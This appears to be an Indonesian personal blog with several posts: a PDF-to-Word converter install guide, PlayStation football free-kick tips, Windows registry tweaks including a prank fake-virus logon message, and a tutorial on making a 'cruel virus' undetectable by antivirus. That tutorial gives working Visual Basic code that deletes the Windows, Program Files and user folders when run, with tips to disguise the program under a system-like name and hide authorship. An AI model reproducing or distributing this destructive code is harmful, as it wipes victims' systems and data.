ubah pdf 2 word

Anda dapat mendistribusikan materi ini secara gratis. Copyright © http://trisnowlaharwetan.net 2008 1 Mengubah file PDF menjadi file Microsoft Word Oleh : Sutrisno Lattar Bellakang Puji syukur kepada Allah SWT yang telah memberikan nikmat berupa kekuatan dan akal sehingga penulis bisa menuangkan gagasan di sini. Sholawat serta salam kita haturkan kepada Nabi Muhammad SAW yang telah membawa kita dari alam kebodohan ke alam pencerahan. Berbeda dengan materi-materi sebelumnya, biasanya kita membahas tentang tips dan trik Microsoft Word dengan Visual Basic Editor, dalam materi ini kita aka membahas bagaimana mengubah file berekstensi .pdf menjadi file berekstensi doc, atau bahasa mudahnya adalah mengubah file pdf menjadi file Microsoft Word. Pdf atau Portable Document Format, adalah suatu format dokumen buatan dari Adobe System Inc. Kelebihan dokumen ini adalah kebebasannya untuk dibuka tanpa tergantung terhadap aplikasi original pembuat dokument tersebut, hardaware maupun sistem operasi terutama untuk membuat dan membuka dokumen tersebut. Materi ini akan membahasa bagaimana mengubah kembali file .pdf menjadi file .doc, dengan bantuan free software pdfwordsetup.exe. Anda sebelumnya harus mendownload software tersebut di : http://jawagame.blogspot.com/2008/11/exctract-pdf-file-to-word-doc.html Lisensi Dokumen: Copyright © 2003-2007 IlmuKomputer.Com Seluruh dokumen di IlmuKomputer.Com dapat digunakan, dimodifikasi dan disebarkan secara bebas untuk tujuan bukan komersial (nonprofit), dengan syarat tidak menghapus atau merubah atribut penulis dan pernyataan copyright yang disertakan dalam setiap dokumen. Tidak diperbolehkan melakukan penulisan ulang, kecuali mendapatkan ijin terlebih dahulu dari IlmuKomputer.Com. Anda dapat mendistribusikan materi ini secara gratis. Copyright © http://trisnowlaharwetan.net 2008 2 IInsttallllasii Soffttware Setelah Anda berhasil mendownload software tersebut, maka Anda harus menginstall file tersebut. Klik kanan file tersebut kemudian Open, seperti Gambar 1, di bawah : Gambar 1. Klik kanan file pdf2wordsetup kemudian klik Open Setelah itu akan keluar dialog, klik Yes seperti di bawah : Gambar 2. Dialog penginstallan Klik Yes untuk melanjutkan, dan klik No untuk batal, karena kita akan menginstall ya tentu di klik Yes to? He he he malah bertanya.. ☺ Setelah di klik Yes, selanjutnya keluar dialog seperti Gambar 3 di bawah : Anda dapat mendistribusikan materi ini secara gratis. Copyright © http://trisnowlaharwetan.net 2008 3 Gambar 3. Dialog setup Klik Next untuk melanjutkan, untuk melanjutkan. Jika Anda sudah mengklik Next akan keluar dialog di bawah ini: Gambar 4. Dialog penempatan file Dari Gambar 4 di atas kita diminta untuk penempatan file yang akan kita install, untuk mudahnya klik Next saja. Selanjutnya akan keluar dialog seperti Gambar 5, di bawah : Anda dapat mendistribusikan materi ini secara gratis. Copyright © http://trisnowlaharwetan.net 2008 4 Gambar 5. Dialog penempatan file setup Dari gambar 5 di atas langkah selanjutnya klik Next, dan akan tampil di dialog persetujuan install seperti Gambar 6, di bawah : Gambar 6. Dialog siap install Selanjutnya klik Install, kemudian akan keluar proses penginstallan seperti di bawah : Anda dapat mendistribusikan materi ini secara gratis. Copyright © http://trisnowlaharwetan.net 2008 5 Gambar 7. Proses pengintallan Setelah selasai penginstallan, maka ditandai seperti dialog di bawah ini ; Gambar 8. Dialgo selesai penginstallan Klik finish, sehingga keluar menu pengubahan dokumen pdf menjadi dokumen word seperti Gambar 8 di bawah : Anda dapat mendistribusikan materi ini secara gratis. Copyright © http://trisnowlaharwetan.net 2008 6 Gambar 9. Tampilan software Pdf Setelah itu kli Tanda silan dipojok kanan atas untuk menutup Hasiill dan Prakttek Setelah kita melakukan langkah pengintallan selesai, maka kita tinggal praktek, he he he … ☺ Sebelumnya kita buka dulu software pdf2wordsetup, seperti Gambar 9 di bawah : Gambar 9. Membuka Free Pdf to Word Doc Converter Setelah itu akan keluar Menu Pdf2Word seperti gambar 10 di bawah : Anda dapat mendistribusikan materi ini secara gratis. Copyright © http://trisnowlaharwetan.net 2008 7 Gambar 10. Tampilan software Untuk mengubah file pdf ke word maka klik tombol browse di bawah Select PDF file for conversion seperti Gambar 11. Gambar 11. Pilih browse untuk konversi file Setelah mengklik Browse, maka akan keluar dialog pemilihan lokasi file pdf yang akan kita konversi menjadi file document, untuk lebih jelasnya lihat Gambar 12, di bawah : Anda dapat mendistribusikan materi ini secara gratis. Copyright © http://trisnowlaharwetan.net 2008 8 Gambar 12. Memilih file pdf yang akan dikonversi Setelah itu klik Open untuk melanjutkan, sehingga dialog selanjutnya seperti Gambar 13, di bawah : Gambar 13. Dialog pemilihan dokumen dan lokasi output file Setelah itu klik Convert to Word Document untuk melanjutkan. Anda dapat mendistribusikan materi ini secara gratis. Copyright © http://trisnowlaharwetan.net 2008 9 Gambar 14. Konversi dari pdf ke dokumen telah selesai Setelah anda mengklik Ok, maka dokumen pdf pun menjadi dokumen microsoft word Selamat mencoba, semoga materi ini bermanfaat…

ibeh bandito

Iklan
Published in: on Maret 30, 2009 at 12:13 pm  Tinggalkan sebuah Komentar  

rumus maen ps2

neh klu mau menang ,maen ps…

ibeh bandito…

RUMUS KOMBINASI
Kalo mau bola agak melambung –> teken “bawah” + “kotak” (bersamaan)
Kalo mau bola biasa aja –> teken “kotak” aja
Kalo mau bola agak mendatar –> teken “atas” + “kotak” (bersamaan)
Kalo mau bola lebih pelan –> teken “X” setelah teken “kotak”
Kalo mau bola lebih kencang –> teken “Segi3? setelah teken “kotak”

Kalo mau bola “pisang” atau “melengkung” atau “belok”
–> setelah teken “kotak” langsung teken “kiri” atau “kanan”

Supaya enggak bingung berikut contoh dan langkah-langkahnya:
1.gue dapet freekick dengan jarak 25 meter
2.tempat gue nendang kira-kira di sebelah kanan depan gawang (artinya arah kiri kiper lawan, ngerti kan?)
2.gue pilih beckham jadi eksekutor (ciee…bahasanya)
3.gue ambil celah paling kanan (jadi celah antara pemain di pagar betis paling kanan sama di sebelah kirinya)
4.gue atur supaya arah bola gue tegak lurus ama celah tersebut
5.karena gue mau tendangan “pisang” atau belokin bola ke kiri (ke arah gawang), jadi dari arah tegak lurus tadi gue teken “kanan” sedikit (jadi kurang lebih tegak lurus ama telinga kanan pemain paling kanan)
6.ok, posisi udah enak, sekarang tinggal mengira2 power yang dibutuhkan (lo harus mengenal pemain lo dengan baik, kalo perlu lo pacarin deh), yah, kira2 powernya setengah atau kurang dikit deh
7.trus gue pengen tendangan gue agak mendatar, atau sudutnya rendah, jadi gue siap2 teken “atas” + “kotak”, trus gue pengen bolanya kenceng dan belok ke kiri, jadi abis itu gue siap teken “segi3? + “kiri”
8.jadi ini urutan tekenannya setelah posisi udah enak :
– pertama, teken “atas” (tahan) trus “kotak” ampe powernya setengah
– setelah powernya cukup, gue langsung lepas kedua tombol barusan
– trus gue langsung teken lagi “kiri” ama “segi3? (dua-duanya
ditahan) ampe beckham udah nendang
– tahan napas………… bersoraklah dan selamat kalo gol
– kalo belum ya…… latihan lagi atuh…

Well, mungkin kelihatannya ribet, gue tahu, mungkin ada yang udah mual n mules2, tapi ya emang gua berusaha menjelaskan dengan baik

Lama2 kalo udah biasa mah gampang, udah ada feeling, gue juga awalnya katro, ga ngerti, tapi lama2 asik deh, jadi girang tiap kali dapet freekick
Bukannya sombong, tapi tinggi hati (lho, sama aja ya..) gue sering bikin gol dengan freekick. Masalahnya tinggal latihan dan feeling ajah. Bahkan gue pernah lho ngegol freekick dari jarak 35 meter bahkan lebih (walau cuma beberapa kali)

Selamat mabok, selamat mencoba, kalo berhasil inget gue yah….
N traktir makan2….. hehehe….. =)

Published in: on Maret 11, 2009 at 7:05 am  Tinggalkan sebuah Komentar  

coba neh broo..

Bermain dengan REGEDIT OS Windows

Trik ini diperuntukkan bagi orang-orang yang mau mencoba, mau membaca, dan pemula. Bagi kaum “expert” juga boleh membaca karena itu hak anda :-), dan bila perlu lewatin aja karena ini jauh di bawah keahlian anda, hehehehe peace. Kalau ga suka jangan di baca apalagi mencoba, karena berbahaya jika tidak di baca betul.

Regedit adalah salah satu sistem yang diterapkan di dalam sistem operasi Windows. Regedit bekerja dengan menggunakan angka biner dan hexadesimal (kalo ga salah). Cara membuka regedit ini gampang, seperti ini :

Klik : Start > Run (muncul box Run) , ketikkan kata “regedit” bisa kapital maupun non kapital.

Regedit memiliki kemampuan-kemampuan rahasia yang belum anda kenal (bagi yang baru tau).  Kemampuan itu dapat anda lihat pada daftar di bawah ini, berikut dengan petunjuk aktifasinya. Selamat mencoba..

Mengganti Nama Recycle Bin

Nama “Recycle Bin” temasuk ke dalam salah satu apliaksi yang tidak bis di ganti namanya. Kalau tidak percaya, coba aja dengan mengklik kanan Icon Recycle Bin pada Desktop, carilah opsi rename-nya. Ga bakalan nemu deh… Nah berikut ini adalah string yang digunakan dalam mengganti nama Recycle Bin itu, selamat mencoba.

HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}

Klik ganda pada option (Default value) dan beri nama baru sesuai keinginan anda pada Value Data.

Menunjukkan File Hidden Operating System

Biasanya setiap orang memiliki privasi tersendiri di dalam komputernya. Untuk itu dilakukan berbagai cara dalam menyenbunyikan folder-folder yang dianggap pribadi atau berisi #$@%^&&. Salah satu cara yang digunakan adalah “Hide Operating  System ” yang dilakukan melalui DOS. Salah satu cara “lagi” yang digunakan dalam menampilkan file yang “superhiden” ini adalah Regedit, selain dengan DOS itu sendiri. So, try this one :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Buat sebuah DWORD Value baru dan beri nama ShowSuperHidden. Klik ganda ShowSuperHidden dan masukkan angka 1 pada Value Data.

Otomatis Mematikan Aplikasi yang Not Responding

Kemampuan ini dapat dilakukan untuk mematikan secara otomatis program-program yang “not responding”. Walau terkadang “kaga” bekerja, hehehe, tapi apa salahnya di coba….

HKEY_CURRENT_USER\Control Panel\Desktop

HKEY_USERS\.DEFAULT\Control Panel\Desktop

Klik ganda AutoEndTasks dan masukkan angka 1 pada Value Data.

Atau

HKEY_USERS/.DEFAULT/Control Panel/Desktop

Klik ganda AutoEndTasks dan masukkan angka 1 pada Value Data.

Kotak Dialog Sebelum Logon

Mau ngerjain orang? Trik ini dapat diandalkan. Kemampuan string ini adalah menampilkan kotak dialog yang berisi judul berikut isinya sebelum Log On Windows. Judul dan Isi Dialog Box dapat diisi sesuai dengan keinginan anda. Cobain aja string ini…

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Klik ganda LegalNoticeCaption dan masukkan input teks judul yang diinginkan (contoh: Virtus Alert).

Klik ganda LegalNoticeText dan masukkan input teks (isi) yang diinginkan (contoh: This computer have been infected by panicattack virus).

Menonaktifkan Fungsi AutoRun

Fungsi string ini dapat diandalkan karena banyaknya virus yang berkembang melalui “autorun”. Matikan fungsi menu autorun komputer anda. Sehingga setiap flashdisk yang ter”cucuk” tidak akan dapat berjalan melalui autorun.

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer

Klik ganda NoDriveTypeAutoRun dan masukkan angka 95 pada Value Data.

Membersihkan Recent Documents

Recent dokumen berguna untuk meninjau kembali setiap file terakhir yang anda buka.  Jika komputer  digunakan oleh banyak orang (like komputer tempat kos-kosan) pengguna terakhir akan berupaya mengapus file-file recent yang pernah dibukanya, apalagi file itu foto ceweknya, hihihihihi. Supaya mudah cobain aja string ini.

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer

Buat sebuah DWORD Value baru dan beri nama NoRecentDocsHistory.

Klik ganda pada NoRecentDocsHistory dan masukkan angka 1 pada bagian Value Data.

Menyembunyikan My Recent Documents

(sambungan cara di atas) Lakukan trik awal dengan string berikut, sehingga Link “My Recent Document” akan hilang dari menu Start anda….

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced

Klik ganda pada Start_ShowRecentDocs dan masukkan angka 0 pada Value Data.

Ending :

Terkadang beberapa string tidak ditemukan atau tidak dapat bekerja sebagaimana mestinya.. balum ada jawaban pasti mengenai masalah ini. Yang jelas, cobain aja dulu..dan  yang terpenting lagi adalah belajar. Untuk mngetahui rahasia lainnya, kunjungi aja : http://ilmukomputer.com ketikan “abe-registry” pada menu search..

Selamat mencoba, jika terjadi kesalahan, lakukan lagi percobaannya. Atau bertanya di forum IT, atau blog ini….

created by ibeh bandito…

ym : ibeh_bandito

Published in: on Maret 9, 2009 at 2:46 pm  Tinggalkan sebuah Komentar  

check this broo…

Bikin Virus Kejam Tanpa Terdeteksi Antivirus

Nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnya cara kerjanya simple gt

Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB

—- more —-

Tutorial Bikin Virus cman 1 mnt

1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32?)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…

Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…

4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32? jadi ga bakal dicurigain

5. Jangan pernah naroh nama lu di nih virus… k?

6. compile deh… slese!

Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri.

created by ibeh bandito

Published in: on Maret 7, 2009 at 6:09 am  Tinggalkan sebuah Komentar  
Tags:

Tugas kuliah

tugas lg nyari

Published in: on Maret 5, 2009 at 8:57 am  Tinggalkan sebuah Komentar